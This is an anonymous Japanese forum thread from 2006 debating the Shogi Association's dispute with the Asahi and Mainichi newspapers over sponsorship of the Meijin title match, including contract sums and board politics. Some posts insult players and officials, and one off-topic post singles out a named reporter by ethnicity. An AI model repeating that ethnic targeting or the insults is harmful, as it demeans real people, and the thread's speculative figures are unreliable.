毎日が共催を受けないだろうと思う根拠は?

84 :名無し名人:2006/11/06(月) 00:44:32 ID:8nbLhIAk
連盟(理事会)は共催かどうかというのはそんなに気にしてなかったと思うよ。
あくまで目的は収入増と構造不況の脱却だったわけだから。
出す物さえ出してくれれば朝日だろうが毎日だろうが共催だろうが構わないというのが
偽らざるところ。これは間違いない。

ただ、共催となると今現在危惧されている「出し渋り」があるかも知れない。
だからイヤだなぁ……というニュアンスが最初からあったのも事実。
まあ「共催を提案すれば毎日が降りる」という意図があったというのも完全に否定できる物ではないが
単なる妄想の域を出ていないのも事実だろう。

85 :名無し名人:2006/11/06(月) 01:04:35 ID:ZuDzJ3lt
共催案は、毎日から降りたように見せるための意図とかは、推測でしかないね。
ただ、私はその可能性もあるように見えた。
( 2chのこのスレ的でも、そういう意見も結構あった気がする)
あと、米長ページみたら、とても毎日と共催含め契約する気がないように見えた。

それと、共催になっても、下のような条件だしているので実現すればおいしい。
米長の共催案(5月)
○契約期間は5年間を基本
○名人戦契約金 4億7000万円を上回ること
○将棋普及協力金、改めて話し合う。
○臨時棋戦、改めて話し合う。

で、結局、毎日に単独主催にするかどうかでの棋士総会投票になって、
それが拒否されてから、朝日が共催を毎日に打診することになった。

その後、共催合意したけど、米長の共催案とはただの希望なだけであって、
その条件で共催を受けるという話は一切でてない。

どうなることやら。

86 :名無し名人:2006/11/06(月) 01:06:42 ID:H+rPoOgE
>>80
11月1日の食い違いから、
毎日の9月の共催承諾と今回の両者基本合意に5月提案に対する諾否は入ってない、が
朝日・毎日共通の認識なのが明らか。
>>77と同じことを言うが9月の「たたき台」発言から、残りの理事はともかく米長は前者を理解してた。
両社発表の合意に5月案が含まれると勘違いした米長および理事連は先走りしてしまった。
朝毎が“元の案”をまるっきり無視するとも思わないが。
仮に無視されたら理事会としては共催を御破算にしたくなる。しかし、そのとき、切るカードはあるのか?

ちゃっちゃと広報コメント撤回して、両社に軽く詫びた方が、心象も良く
今後の交渉にもプラスだと思う。会長の気質から最初の通知と同じく強行突破の線も濃厚。

>>83
9月19日以前には米長のページに「毎日の敗因」的な表現が踊ってたように記憶するが?
もっとも「米長は毎日が尻尾を巻いて逃げ出すと思ってた」証拠にしかならないか。

87 :名無し名人:2006/11/06(月) 01:21:13 ID:8nbLhIAk
>>85
そこのところは朝日+毎日が金銭的にどういう提案をするかにかかってる。
朝日オープンと王将戦の個別交渉の項は、提案内容がどうあれ決まりだと思うが。

ただ、あまりに提案金額が低いと普通に交渉決裂もあると思う。
これは理事会の一存ではなく、棋士の総意としてね。こうなるのは朝日も毎日も避けたいだろうから
叩き台となった米長案とまでは行かないまでも、ある程度連盟の面子を立てた条件提示を
してくるとは思うけどね。

88 :名無し名人:2006/11/06(月) 02:42:12 ID:U7JlLehV
クーデターなら、これからでもできる。というか、総会でやる限り、クズ棋士は※のいいなり
になっているから、有力棋士は新連盟を立ち上げ、独立するという形になるしかない。
今のところ新聞社は利害が食い違っているから、足並みが揃わないが、連盟が朝日毎日
連合に今後非礼を今のペースで浴びせ続ければ、新聞社全体もまとまるだろう。
そのときが※の最期だな。
新聞社はトッププロ10人(せいぜい30人)がいれば十分、クズプロが多数で連盟を
牛耳るなんてとんでもないと思っている。要はタイミングの問題だけ。


89 :名無し名人:2006/11/06(月) 04:31:31 ID:Ki2UTjQu
さすがに連盟が割れるとは思わないけど、「共催実施→相当額の収入減→
理事全員が責任をとって辞任」、というのが普通の社会では最も起こりそうな
ことだと思うけど、なにしろ将棋脳集団だからどうなることやら。

90 :名無し名人:2006/11/06(月) 04:39:18 ID:U7JlLehV
連盟が割れるのは、十分ありうると思う
エリート棋士と新聞社の利害は一致しており、※とクズプロを排除
しなければ危機を乗り切れないということも同じ立場
有力棋士に新聞社が声をかければすぐにでも実現できる

ただ、スポンサーの考え次第なので、新聞社が一枚岩になれるか
どうかが問題
足の引っ張り合いになると※の思惑にはまる

91 :名無し名人:2006/11/06(月) 04:46:07 ID:Ki2UTjQu
>>90
そんな根性のある棋士がいたなら、今回のような騒動は起きなかったと思われ

92 :名無し名人:2006/11/06(月) 08:56:08 ID:OXXKRjzG
>>90
そんな単純じゃないと思われ。
結局棋士は誰しも連盟の存在を前提に仕事してきた訳だし、
連盟の制度を前提としてプロ棋士というアイデンティティを持っている。

個人的には、
1. 契約金は一社当たり2億円をさしあたり提示するが、増額交渉には応じる
2. 普及協力金は使途が曖昧で購読者の理解が得られないので一切支払えない
位の提案で交渉がはじまると、いろいろな意味で面白いと思う。

名人戦の契約金があまり上がってしまうと5年後の選択肢が実質限定されるので
連盟としては難しいところなのか、とも思う。

これも妄想だが、連盟との契約金は抑えめにし、掲載された棋譜に対してその都度
掲載料を支払う、的な制度設計にしても面白いと思う。

93 :名無し名人:2006/11/06(月) 10:39:21 ID:5EaksLtw
やっぱ、こういうことには、代理店が入った方が良かったんじゃないかな。
新聞社のみで話し合われた結果、グルまれてしまったような。
腹を割って話し合ってみれば、もう何十年もお互い被害者になってきましたよね、かも。

とにかく、連盟はこれまでの関係をご破算にしてしまったのだから、
落ち着き先はまだまだ遠いのだと思う。
連盟のコメント、それに対する新聞側のコメントでわかるとおり、両者の関係性はゼロ。

投票結果僅差を理由にした共催案だから、名人戦はもうよそにはいかない道理。
朝日&毎日には持ち時間がたっぷりある。

94 :名無し名人:2006/11/06(月) 12:31:18 ID:/xkuHQj+
まだ分裂とか祭りがみたいだけのおこちゃまがいるのか

95 :名無し名人:2006/11/06(月) 12:41:09 ID:m+EJqgOS
クズ棋士は米長の持ってる権益のおこぼれにあずかりたいだけだから
失脚した米長についていくクズ棋士なんておらんよ
中川はどこまでもついていきそうだが

96 :名無し名人:2006/11/06(月) 13:42:38 ID:LZL+56RY
羽生を始めとする主力棋士が名人戦移管に反対だからって、別にクーデターを起こしたり
連盟を割るつもりというのは、最初からなかったと思う。
結局、名人戦問題は連盟が抱えている問題の一つに過ぎないわけだから。
>>78が言うように、あくまで是々非々で事を判断というのが、基本的なスタンスじゃないかな。
いざとなれば来年の5月に理事選挙もあるし、どうしても相容れないというなら
そこで自分らが立って何とかするのだろう。

97 :名無し名人:2006/11/06(月) 15:18:54 ID:AOS92FJ5
>>95
中山かよwっと

98 :名無し名人:2006/11/06(月) 17:09:04 ID:E/NLiixa
しかしなんだな、ことの起こりは職員の退職金が払えない、とか※が騒ぎ出して、
その補填のために各棋士から100万円徴収するとか脅しをかけて、
それがイヤなら朝日新聞社様へ名人戦を移して普及協力金を貰ってそれに充当する、
てな話だったんだよな。
それで、連盟としてはタイトル保持者と挑戦者、それと一部のトーナメント参加の
上位棋士だけが潤うことになる棋戦契約金じゃなくて、退職金に充てられる普及協力金
を出してくれる朝日様におすがりしようとした訳でその帰結が毎日への契約延長断り状
であり棋士総会での採決だった。
しかし、朝日単独では過半数が取れなさそうということになって一部棋士に対しては
共催をするから毎日単独には投票するなと脅しをかけ、その結果共催に話を持って
行かざるおえなくなった。
この間に、退職金問題は単なる※の無知故に騒いだことが分かって、今度は普及協力金
をまるで※のポケットマネーになったような気分で何に使うのか嬉しそうに自分の
サイトで書き込んでいた。
もうその行動といったらら、場当たり的自転車操業で、先を読むことを職業としている
プロ棋士の片鱗も伺えない。
今回の朝日毎日のタッグチームの結成で、毎日から名人戦を奪い取るためだけの目的で
発表した※が欲しいところの協力普及金の話が吹っ飛んだわけだ。
どう見ても共催に至るまでの一連のゴタゴタは※ジョンイルに全責任あるわけで、
やはり早急に辞任してもらうしかないんだろう。プロ棋士諸君どうよ?

99 :名無し名人:2006/11/06(月) 18:07:30 ID:yOLFlfgr
>>98
もうその行動といったらら、場当たり的自転車操業で、先を読むことを職業としている
プロ棋士の片鱗も伺えない。

というより、その日暮らしのやくざな真剣士の発想そのものだよ。
たかることだけ考えてる。。

100 :名無し名人:2006/11/06(月) 18:59:26 ID:U/1zwbES
米長はその場の思いつきでモノを言うからね。
彼の言葉を深く考えても無意味だよ。

101 :名無し名人:2006/11/06(月) 19:04:09 ID:V5lQlnq7
毎日新聞の在日記者「朴鐘珠」が知事にかみつくシリーズ

天皇皇后を佐賀に呼ぶなとかみつく
http://www.youtube.com/watch?v=-mXFNXCuWgc
職員採用の国籍条項でかみつく
http://www.youtube.com/watch?v=G82eePvdZHg
プルサーマル問題でかみつくPart1
http://www.youtube.com/watch?v=HUY-wgh2dTs
プルサーマル問題でかみつくPart2
http://www.youtube.com/watch?v=oZHLCZ4rd68
プルサーマル問題でかみつくPart3
http://www.youtube.com/watch?v=q4aNbUuOnP0
新幹線問題でかみつくPart1
http://www.youtube.com/watch?v=BBXtYYPMuCY
新幹線問題でかみつくPart2
http://www.youtube.com/watch?v=DFUFiEzaflo

番外編

佐賀県知事による豊かな海づくり大会報告
http://www.youtube.com/watch?v=uZsA-E2s-cY
佐賀県知事、2ちゃんねる監視問題について語る
http://www.youtube.com/watch?v=K0zLkO-E9Fg


102 :名無し名人:2006/11/06(月) 19:18:33 ID:5EaksLtw
>101
それ、質問内容はごくまともじゃんってだけの話だけど、
そんなことより、
今回の将棋の日が佐賀開催なのをふまえて貼ってくれてるわけ?

103 :名無し名人:2006/11/06(月) 19:27:14 ID:1s1OeDvF
将棋の日に発表できれば、
マスコミもイベントに呼べるし、めでたい日にめでたい話だし、他に話をそらせる。
間に合わないと、めでたい日に両新聞社関係者と鉢合わせしつつ、
後で名人戦問題のためだけに気の重い会見をしなきゃならない。
将棋の日に出ないようなら、意外と揉めてるってことだろう。
今まさに微妙な時期に微妙な交渉中で、西村発言や米長の一枚岩発言はその現われか。

104 :名無し名人:2006/11/06(月) 19:30:20 ID:5D552tGz
名人戦、朝日OP、王将戦、普及協力金とか色々決めなきゃならんとなると相当かかりそうだな

105 :名無し名人:2006/11/06(月) 19:36:52 ID:20xrEi2E
>>63>>103のような冷静な意見もあれば、>>98のような感情論丸出しの意見もあるのが
このスレの面白いところか……。

106 :名無し名人:2006/11/06(月) 20:08:43 ID:f6zz09Ta
>>102
毎日新聞社社長室広報担当は「記者の質問は言葉遣いや態度に節度を欠くものがあった。
また、『全国豊かな海づくり大会』そのものが、天皇、皇后両陛下のご出席と
切り離せない行事であるとの認識を欠き、不勉強だった」とコメント。


毎日新聞社社長室広報もまともだと思ってないんだが

 ど こ が ま と も な ん だ ?




107 :名無し名人:2006/11/06(月) 20:11:32 ID:T66mWioU
>>105
>98、俺にはあながち感情論丸出しの意見と言い切れない気がするけど・・・。
表現の面で2ch風の味付けをしてる様には見えるが、薄ら禿げ同だったりする。

108 :名無し名人:2006/11/06(月) 20:12:37 ID:J8EJ/XBH
>>106
激しく板違いだ。よそでやってくれ。


109 :名無し名人:2006/11/06(月) 20:17:04 ID:J8EJ/XBH
>>107
同歩。
>>98は※長のやりかたに批判的だが、批判は事実関係をふまえており理詰めだ。
こういうのは感情論とはいわない。

>>98を読んで、そうだよな、※長は最初、連盟職員の退職金が1億足りない!と
言ってたんだよな、と懐かしく思い出したよw

110 :名無し名人:2006/11/06(月) 20:18:01 ID:ZuDzJ3lt
> 職員の退職金が払えない
もう風化したネタだけど、なんだったんだろね、あれ。


111 :名無し名人:2006/11/06(月) 20:30:03 ID:U/1zwbES
だから米長の言うことを深く突き詰めようとしても無意味だよ。
思いつきで適当なホラを吹いて、知らん振りなんだよ。

112 :名無し名人:2006/11/06(月) 21:10:35 ID:haW2S468
毎日新聞購読者はこんな人格になるんだね

113 :名無し名人:2006/11/06(月) 21:21:12 ID:LGhtC1w1
>>107
そういう2ch風味のアレが「感情論」って映る部分はあるかもね。
主張そのものが正しいかどうかは別だけど。

114 :名無し名人:2006/11/06(月) 21:22:45 ID:U/1zwbES
感情論だろうがなんだろうが、筋さえ通っていればそれでよし。
冷静にトンチンカンなことを言われても困るし。

115 :名無し名人:2006/11/06(月) 21:28:44 ID:20xrEi2E
>>107
んー…でもねぇ。単に事実関係と結果がどうなるかという問題にしか
興味のない俺にとっては、>>63とかのレスの方が冷静というか建設的に見えるわけよ。
ここで米長が辞めたところで、すべてがご破算、元通りになるわけでもない。
だいたい棋士に米長を辞めさせる気があったら、とっくの昔にそうなってただろうし。

116 :名無し名人:2006/11/06(月) 21:34:14 ID:LGhtC1w1
しかし今日の長文レスで筋道が通ってると言えるのは>>78>>82>>85>>92くらいしかないけどなw

117 :名無し名人:2006/11/06(月) 21:38:12 ID:LGhtC1w1
>>115
>>63のレスは建設的というより事実関係を基にした推論でしょ。
別に建設的な意見が呈示されてるわけじゃない。
言ってることは別に間違ってはいないと思うけど。

118 :名無し名人:2006/11/06(月) 21:41:44 ID:eLzuwxrv
俺は一介の将棋ファンに過ぎないが、今回の名人戦移行には反対だった。
別に毎日に恩があるわけではなく30年前の朝日との決裂にも反対だった。
朝日にせよ毎日にせよ、スポンサーは大事にしなければならないという当たり前の常識論だ。、

しかし済んだことを言っても仕方がない。

現時点ではもう毎日単独へ戻るという選択肢はありえない。
朝日・毎日の共催でどんな不利な条件を押し付けられても我慢せざるをえないだろう。

おそらく名人戦の契約金は竜王戦よりわずかに下。
付帯条件をどうするかの争いになるだろうが、
ここで理事会は「損して得とる」の精神で頑張って欲しい。

「普及協力金」では朝日も毎日も金をだしずらいだろう。
朝日・毎日が双方競って、全国の地方都市で名人戦大番解説会を開き
その解説者として連盟から棋士を派遣するとか、名人戦と連動して全国各地で
将棋イヴェントを開き、そこにプロ棋士を呼んでもらうとか、一般への普及活動と
つながるような形で連盟や棋士に金が落ちる仕組みを提案して欲しい。

あるいは全国の朝日カルチャーセンターに将棋講座を当面採算度外視(赤字朝日新聞本社もち)で設けてもらうとか。


119 :名無し名人:2006/11/06(月) 21:48:32 ID:U/1zwbES
>ここで理事会は「損して得とる」の精神で頑張って欲しい。

彼らにそんな精神があるなら、そもそもこんな手詰まり状態になっとらんですわな。



120 :名無し名人:2006/11/06(月) 21:51:26 ID:pUwNjfJW
毎日も朝日も、一度冷静になって、いくらぐらいの費用を負担する
のが妥当か、よく考えたらいいよ。新聞観戦記というスタイルは、
毎年何億円もかけるにふさわしいものではないし、有料サイトを
継続するなら、その収入に見合う程度の支出にすべき。
新聞購読料をドブに捨てるような金の使い方を何十年もしてきた
ツケが回ってきているのだよ。

121 :名無し名人:2006/11/06(月) 22:03:47 ID:20xrEi2E
新聞社は将棋に億の金を出すよりも、プロ将棋に金を出すのをやめることによって
「あの新聞社はたった数億の金をケチった」と言われる方がよっぽど嫌なわけ。

本来、棋譜の独占掲載に何千万の価値なんてあるわけがない。
文化メセナという建前と、自分たちの見栄のためにお金を出しているのが現状。

これも新聞業界が2兆円産業だから為せる業。

122 :名無し名人:2006/11/06(月) 22:46:25 ID:pUwNjfJW
新聞社が本当に切羽詰まった経費削減をやるところまで追い込まれていない
のだろうな。順位戦は、削りしろの宝庫なのに。
将棋と同じように、何億円も無駄に使っている事業がいくつもあるのだろ。

123 :名無し名人:2006/11/06(月) 22:59:53 ID:20xrEi2E
再販制度の特殊指定がある限り、新聞社はどうあっても安泰だし、将棋が無くなることもない。
ただ、それがなくなれば全滅確定。

まあ赤旗は続けるかも知れないが。

124 :名無し名人:2006/11/06(月) 23:08:35 ID:U/1zwbES
新聞以外の有力スポンサー開拓は無理なんだろうか。


125 :名無し名人:2006/11/06(月) 23:11:12 ID:oEYzqaSa
>>121
> 新聞社は将棋に億の金を出すよりも、プロ将棋に金を出すのをやめることによって
> 「あの新聞社はたった数億の金をケチった」と言われる方がよっぽど嫌なわけ。

それは違うと思う。金をケチったと言われるのが嫌なのではなくて、他紙が載せて
いるんだからうちもという横並び意識がそうさせていると思う。
不採算を承知の上でね。

逆に言えば、どこか一角が崩れたら、雪崩を起こした様にみんな撤退するという
シナリオがあり得るんだよね。

126 :名無し名人:2006/11/06(月) 23:14:28 ID:U/1zwbES
>>125
あり得る。特に大手がやめれば。
「お宅様がやめるのなら、うちも・・・」
てな感じでダダダッといく。


127 :名無し名人:2006/11/06(月) 23:16:17 ID:pUwNjfJW
新聞社がスポンサーになるんだったら、棋譜を掲載できる程度の
対局数で十分。現状は、名人戦の名のもとに、ボッタクリみたい
な商売になっている。

128 :名無し名人:2006/11/06(月) 23:21:46 ID:haW2S468
本当やめるならスパッと将棋から手を引いた方がいいと思うよ。
グダグダ文句垂れながら共催するぐらいなら最初から受けなければいい。
華道、茶道、柔道、日本の伝統文化なんて他にたくさんあるんだから。

129 :名無し名人:2006/11/06(月) 23:23:41 ID:20xrEi2E
>>125-126
産経が夕刊をやめた時に同じようなことを言われたが、結局はどこもまだ辞めてない。
それくらい新聞社というのはメンツ意識が強い。
現状では「どこか一角が崩れたら」すら起こらないと思うよ。
毎日はチャンスだったんだけどねw

130 :名無し名人:2006/11/06(月) 23:31:02 ID:U/1zwbES
そうね、起こらないといいね。

131 :名無し名人:2006/11/06(月) 23:44:44 ID:nLxN2Vll
毎日新聞は週刊将棋の次に将棋欄が多い新聞だぜ。
しかも販促でその週刊将棋も付けているぐらいで、今更将棋を辞めるわけにはいかんだろう。
読売が巨人から撤退するという方がまだ信じられるよ。

132 :名無し名人:2006/11/06(月) 23:49:24 ID:haW2S468
朝日単独案が
名人戦 3億5500万円
普及金 1億5000万円
臨時棋戦 4000万円
だから、共催案が年5億4500万以下なら、毎日はいない方がいいって
ことになる。
下手に契約金で揉めるより、将棋から手を引くことが毎日新聞・連盟
双方にとって得かもしれない。

133 :名無し名人:2006/11/06(月) 23:51:48 ID:oEYzqaSa
>>129
夕刊廃止と一緒にするのは無理があるよ。
影響の規模が違いすぎる。

134 :名無し名人:2006/11/06(月) 23:52:46 ID:FXTZ0TUB
名人戦は竜王戦をやや上回る程度で序列1位に
朝日OP、王将戦は現状維持

個人的希望ではこうだな

135 :名無し名人:2006/11/06(月) 23:53:52 ID:LGhtC1w1
数億のカネが惜しいって言うなら、新聞社はとっくの昔に将棋なんて辞めとるよw
新聞社の文化支援等に関する支出は総額で1000億とも1500億とも言われている。
将棋のパイなんてその中のせいぜい1〜2%に過ぎない。金額的には微々たるもの。

もっとも、新聞社も広告収入、販売収入ともに洒落にならんくらい落ち込んでるから、こういうところに
今後手をつけないとも言い切れんがね。

136 :名無し名人:2006/11/07(火) 00:55:00 ID:nkfRaCSM
>>135
>新聞社の文化支援等に関する支出は総額で1000億とも1500億とも言われている。
>将棋のパイなんてその中のせいぜい1〜2%に過ぎない。金額的には微々たるもの。

残り98〜99%の中で、スポンサーである新聞社に対して
一方的に契約打ち切り通告をしたり、
新聞社のネガティブキャンペーンのために当方が悪者にされてしまったと広言し、非難したり、
今後はA社と契約することになったがB社の敗因は〜、と長年のスポンサーを敗者よばわりしたり、

・・・という振る舞いをした団体は、日本将棋連盟以外には存在しないだろうね。

137 :名無し名人:2006/11/07(火) 01:13:51 ID:n+SY+n6C
条件いいところと契約するのは当たり前なのは置いといて、納得
いかないなら契約する必要はないね。
サッサと将棋からは手を引いて、次のコンテンツを見つけるに限る。
将棋に出す金は高すぎ、将棋以外のコンテンツなんて山ほどあるって
このスレじゃ繰り返し言われていたし、丁度いい機会だよ。
朝日にとっても名人戦独占の方が希少価値上がって都合がいいしね。

138 :名無し名人:2006/11/07(火) 03:33:50 ID:eRuMrF7f
じゃあ名人戦はスポンサー無しで
棋譜掲載は週刊将棋の独占で
希少価値最高になって週刊将棋売上倍増で連盟ホクホクじゃね?


139 :名無し名人:2006/11/07(火) 03:53:01 ID:e3KWlm1H
新聞社にしても「将棋文化は新聞社が育てて来た」って自負があるからおいそれとは切れんよ。
単なる一コンテンツとの違いはそこ。
昔からの遺産って部分は確かにあるが、競技人口自体は未だに数百万人いるし、プロ制度もシステムとして認知され
制度としても確立している。それを作って支えてきたのは紛れもなく新聞社。
何か別のもので代わりが効くというものではない。

今回の件でプロ棋士全体が失礼な態度に及んでいるというならともかく、今現在のトッププロは幸いなことに
対応そのものは極めて常識的であり、新聞社はそのことをちゃんと理解している。
単にこの問題だけを捉えて「将棋というコンテンツに対する価値の見直しを」といった頭の悪いことを言い出すような
短絡的な思考は持ち合わせていないと思う。ま、当然こういうことが立て続けに何件も起きれば別だけど。

140 :名無し名人:2006/11/07(火) 05:50:29 ID:sCuNFkTQ
週刊誌に載ってたけど、朝日は広告収入が激減しているらしい。
大朝日にしてこの状況だから、ましてや毎日の現状は察するにあまりある。
それに新聞業界全体がインターネットの普及で将来的にこれ以上の売上増は見込めない
と思っている。
そんな状況で重要棋戦のインターネット中継で最早新聞の将棋欄を楽しみにしている
人は極僅か。
全体のパイが増える要素はどこにもないどころか減る要素がテンコ盛り。
朝日毎日は当然支出削減に懸命になること間違いない。
今までの収益スタイルでは連盟の将来は本当に危ない。
先ずは、年間にひと桁しか対局がなく、尚且その勝率が2割にも満たない棋士から
リストラするのが筋だろうな。
※はそれを先送りして退職金を上乗せしようとしていたらしいが、これでは連盟が
間違いなく潰れるよ。

141 :名無し名人:2006/11/07(火) 07:28:45 ID:n+SY+n6C
毎日が撤退すれば将棋好きはこぞって朝日に移動するだろうし、
朝日ウマーだろう。
毎日は別コンテンツでの巻き返しを狙えばいい。
年5億4500万以下なら毎日と契約する理由ないし。
連盟は共催を受ける条件を、「共催交渉決裂の場合、朝日単独案を
採用する」と明記したら毎日にゴネられることもなかったのにね。
まぁ連盟の共催条件が満たされなければ交渉決裂は当然か。
そうなると面白いな

142 :名無し名人:2006/11/07(火) 08:19:53 ID:xh9BvN7/
>>141
>年5億4500万以下なら毎日と契約する理由ないし。

事態の推移を把握してますか?
いま現在の将棋連盟の交渉相手は、朝日・毎日ですよ。
すでに他の人が何度も指摘しているはずだが、朝日・毎日の提示する条件が気に入らない
からといって、朝日と単独で契約するなんてできないよ?交渉ごとっていうのは相手あっての
ものなんだから。
連盟談話は朝日・毎日が揃って否定しているんだよ?
それを「毎日にゴネられることもなかった」って・・・。現実を無視して妄想の域に入っている。

143 :名無し名人:2006/11/07(火) 08:53:29 ID:4vMeuA0N
>>132,137,141
毎日が共催から手を引けば、朝日の当初案通りになって万々歳と思う事が出来る
おめでたい人だね。

まず、当初朝日が提示して来た案は、既に連盟から断った形になっているので、
毎日・朝日の共催が破談になっても、その条件でそのまま契約することはあり得ない。

一番問題となるのが、普及協力金。当初から用途が不明確な金と言われていたが、
これまでの過程の中で、NSNの借金補填のためではないかとか噂され、ますます
きな臭さが増してきた。
そんな怪しげな金を、例え非上場であろうとも、株式会社である朝日新聞社が出せ
るかとなると微妙。
出すなら、明確な事業計画を提示させられ、ひも付きの金としてしか使えない。

また、当初の朝日案が連盟にとって、本当に得だったかと言う問題もある。
契約金は増額になったとしても、朝日オープンがなくなる訳だから、現在、毎日が
出している名人戦の額と朝日オープンの額を足した金額を超えないとマイナスに
なる。

理事会も、さすがにそれは承知していたから、その穴埋めのために

「王将戦をビッグタイトルにしてもらっても構わない」

と言った訳でしょ?

金額は、しっかり中身も見ないと判断を誤るよ。

144 :名無し名人:2006/11/07(火) 10:26:00 ID:sWni0OLV
また毎日撤退厨が沸いてきたか。
おまえらの願望は既に潰えてるんだよ。

145 :名無し名人:2006/11/07(火) 12:10:05 ID:+o7u21Er
少し前までは毎日撤退=アンチ連盟だったのに
今では毎日撤退=連盟側か
いまさら毎日が撤退してもどうにもならんがな

146 :名無し名人:2006/11/07(火) 12:20:02 ID:ZwGJpRWC
新聞社が将棋から撤退する、しないってのはあくまで願望っつーか妄想に過ぎないわけだから
あれこれ言っても仕方ないんだがな。
>>139が言うように、「そう簡単には切れない」ってのが本当のところだとは思うが。
毎日が名人戦共催の道を選んだのも結局はそこだしね。


147 :名無し名人:2006/11/07(火) 22:57:58 ID:n+SY+n6C
毎日にとってこの共催案は命綱みたいなもの。
なにはともあれ5億4500万円より共催案が下がれば、連盟は当然
共催案を受けない。
たとえ以前の朝日案で契約してくれる補償がなくてもね。
そういう意味で、もし共催に決まるとすれば5億4500万以上ってことは
間違いない。

148 :名無し名人:2006/11/07(火) 23:13:11 ID:M1/p8Ev2
金額でもめたら、読売にやってもらうつもりかね。

149 :名無し名人:2006/11/07(火) 23:20:10 ID:4Uel18ky
今年中には契約金など発表して欲しいものだ。


150 :名無し名人:2006/11/07(火) 23:21:20 ID:zgk/eQvn
5億4500万円以下では連盟は拒否するって、毎日新聞の将棋撤退説よりも
現実味が薄い訳だが。
共催案の契約金は名人戦単独の契約金と確定しているので、5億4500万円
なんて数字は一切関係ない。3月の朝日提案である3億5500万円にどれだけ
上積みできるかが理事会の交渉能力。
共催案になってからは毎日がどうこうって話は話題の中心ではないのだが?

>>147
もしかしてハードルを上げておいて、金額が下回ったら理事会叩きをしようっ
て狙いか?

151 :名無し名人:2006/11/07(火) 23:42:10 ID:n+SY+n6C
>>150
タイトル戦の契約金とは、新聞社が棋譜を掲載する権利のために
払うお金って知ってる?
今は朝日→朝日オープン、毎日→名人戦だけど、来年以降は
2社とも名人戦になるので、2社の契約金総額4億7千がベースに
なるのは当然。
こんなことは説明するまでもないことだが。


「共催案の契約金は名人戦単独の契約金」というのは交渉を有利に
進めるための揺さぶり。
連盟もそれに気づかないほど間抜けじゃないでしょ。

152 :名無し名人:2006/11/07(火) 23:52:57 ID:4Uel18ky
名人戦単独契約に、4億7千円って意味!?
で、それ以下なら連盟から契約しない?

まぁ、いろいろ意見があるのは面白い。
それと、トリップ付けてくれるとありがたいな。


153 :名無し名人:2006/11/07(火) 23:59:08 ID:n+SY+n6C
>>152
なにか異論があるならどうぞ。
君はトリップをつけないの?

154 : ◆1py37ZPJ9A :2006/11/08(水) 00:05:55 ID:4Uel18ky
異論としては契約金が高すぎるな。
あと、連盟が4億7千円下ったら、連盟から断るとはとても思えない。

トリップは、今後、ずっと俺もつけるから君もつけてくれ。
みんなもできるだけ、トリップ付けないか?

155 : ◆iwbgLiTpNU :2006/11/08(水) 00:15:58 ID:5A/qQCi4
君が付ける限りは俺もトリップつけるよ。
>>154
断ると思えない根拠はなに?
朝日と毎日、2社の棋譜掲載料を交渉するんだから、その和
4億7千万がベースになるのは当然じゃない?
もっとも、もし来年朝日が新聞の将棋欄に名人戦を載せないって
いうなら別だけど、違うでしょ?

156 : ◆iwbgLiTpNU :2006/11/08(水) 00:34:16 ID:5A/qQCi4
共催額が朝日単独案5億4500万を上回ると思う根拠は3つ。

@この額よりも下回れば連盟は共催案を受けない。
朝日単独案よりも安いのに、共催を受け入れる理由がない。


A朝日と単独交渉になっても、朝日は5億4500万から値下げ
することなく契約してくれると考えられる。
共催交渉が決裂し朝日単独案しかなくなったときに、以前の
条件を放棄しての値下げ要求は印象が悪い。
イメージはマスコミにとって生命線であり、多少お金を払っても
綺麗に契約をまとめて連盟に恩を売り、将棋ファンの好感を
得た方がこれから名人戦を運営していく朝日にとっても都合がいい。


B毎日にとって共催案決裂は、リスクが大きい。
もしここで毎日が名人戦を契約できなければ、大手の中で
ただ1つだけ将棋欄がなくなり取り残されることになる。
名人戦の有料サイトもなども閉鎖となり、今まで集めた会員もパー。
今から新棋戦を立ち上げるのも、残り時間がなく厳しい。

157 : ◆1py37ZPJ9A :2006/11/08(水) 00:35:22 ID:YefoB887
>> あと、連盟が4億7千円下ったら、連盟から断るとはとても思えない。
> 断ると思えない根拠はなに?
「連盟から断るとはとても思えないね。」と書いたんだけどね。
連盟の共催案が、4億7千万を希望しているのは知っているが、
最初の段階でわざわざ少なく希望しないし、かなりふっかけた値段だと思う。

それに、この値段でいいなら、共催合意時の連盟コメントに、
毎日、朝日ともそんなに反発しなくてもよかった。

> もっとも、もし来年朝日が新聞の将棋欄に名人戦を載せないって
> いうなら別だけど、違うでしょ?
前後の文脈わかりずらいな。
これは、朝日は絶対名人戦をのせる。
だから、4億7千万以下なら連盟は契約しないといわれれば、
朝日はその契約を飲むしかないという意味であっているかな?

名人戦の契約が成立しなくて困るのは、連盟のほうが大きいでしょう。
名人戦(順位戦)は、棋士の基本給みたいなもんなんだから。

まあ、お互い妥当な線では、契約成立するでしょうが、
その額は4億以下だと思います。


158 : ◆1py37ZPJ9A :2006/11/08(水) 00:38:14 ID:YefoB887
> 共催額が朝日単独案5億4500万を上回ると思う根拠は3つ。

ひょっとして、名人戦契約金を、臨時棋戦、普及協力金まとめていっている?
朝日提案の単独名人戦契約金は、3億5500万なんだけど。


159 :名無し名人:2006/11/08(水) 00:42:53 ID:k1Uil2qq
>>157
>連盟の共催案が、4億7千万を希望しているのは知っているが、
>最初の段階でわざわざ少なく希望しないし、かなりふっかけた値段だと思う。

名人戦:3億3400万円
朝日オープン:1億3480万円
これを足しただけなんだから、最低限度ですよ。
これでふっかけたなんて思ってるなら、名人戦移転する必要ないって。

160 : ◆1py37ZPJ9A :2006/11/08(水) 00:45:40 ID:YefoB887
ちなみに、俺の日曜のIDは、「6nxnJgqj」 月曜は「ZuDzJ3lt」

もし、◆iwbgLiTpNU の日曜のIDが 「F0wlrCDF」なら、話し合うこと無いかな。
基本的なところで、知らなかったり、間違っていたりするんじゃ、話すの疲れる。


161 :名無し名人:2006/11/08(水) 00:49:12 ID:YefoB887
失礼、まちがって、ageちゃった。

共催額=名人戦単独の契約金で、5億4500万を上回ると解釈していいのかな。


162 : ◆iwbgLiTpNU :2006/11/08(水) 00:55:17 ID:5A/qQCi4
>>156の共催額5億4500万は普及協力金などを含んでのお金ね。

>>157
・連盟の発言に反発したこと
・共催案を名人戦のみの契約金とし、朝日オープンなどは個別交渉
としたのは、新聞社の交渉術と考えていい。
交渉相手に有利なことを約束するような人はいない。

例えば、新聞社の言うとおり共催案は名人戦の契約金のみを
決めたとする。
残りの普及協力金、朝日オープンなどはまた別交渉・・・・誰が
一体払うというの?
これらは名人戦とセットだからこそ引き出せるお金であり、名人戦の
契約金が決まれば払う必要はないお金。
だから連盟は共催交渉の際これらをまとめた金額で交渉する
必要がある。
しなきゃただの間抜け。

163 : ◆1py37ZPJ9A :2006/11/08(水) 01:09:21 ID:YefoB887
